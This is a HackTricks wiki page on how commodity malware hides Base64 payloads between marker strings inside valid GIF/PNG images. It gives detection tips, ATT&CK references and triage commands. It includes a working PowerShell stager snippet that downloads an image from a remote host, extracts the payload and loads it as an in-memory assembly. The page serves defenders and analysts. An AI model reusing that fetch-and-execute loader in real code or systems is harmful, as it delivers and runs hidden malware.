Malware & Network Stego

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Not all steganography is pixel LSB; commodity malware often hides payloads inside otherwise valid files.

Practical patterns

Marker-delimited payloads in valid images

If an image is downloaded and immediately parsed as text/Base64 by a script, the payload is often marker-delimited rather than pixel-hidden.

Commodity loaders increasingly hide Base64 payloads as plain text inside otherwise valid images (often GIF/PNG). Instead of pixel-level LSB, the payload is delimited by unique marker strings embedded in file text/metadata. A stager then:

  • Downloads the image over HTTP(S)
  • Locates start/end markers
  • Extracts the between-text and Base64-decodes it
  • Loads/executes in-memory

Minimal PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
  $b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
  $bytes = [Convert]::FromBase64String($b64)
  [Reflection.Assembly]::Load($bytes) | Out-Null
}

Notes:

  • ATT&CK: T1027.003 (steganography)
  • Detection/hunting:
    • Scan downloaded images for delimiter strings.
    • Flag scripts that fetch images and immediately call Base64 decoding routines (PowerShell FromBase64String, JS atob, etc).
    • Look for HTTP content-type mismatches (image/* response but body contains long ASCII/Base64).

Other high-signal places to hide payloads

These are typically faster to check than content-level pixel stego:

  • Metadata: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments.
  • Trailing bytes: data appended after the formal end marker (e.g., after PNG IEND).
  • Embedded archives: a ZIP/7z embedded or appended and extracted by the loader.
  • Polyglots: files crafted to be valid under multiple parsers (e.g., image + script + archive).

Triage commands

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

References:

  • Unit 42 example: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
  • MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
  • File format polyglots and container tricks: https://github.com/corkami/docs
  • Aperi’Solve (web-based stego triage): https://aperisolve.com/

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks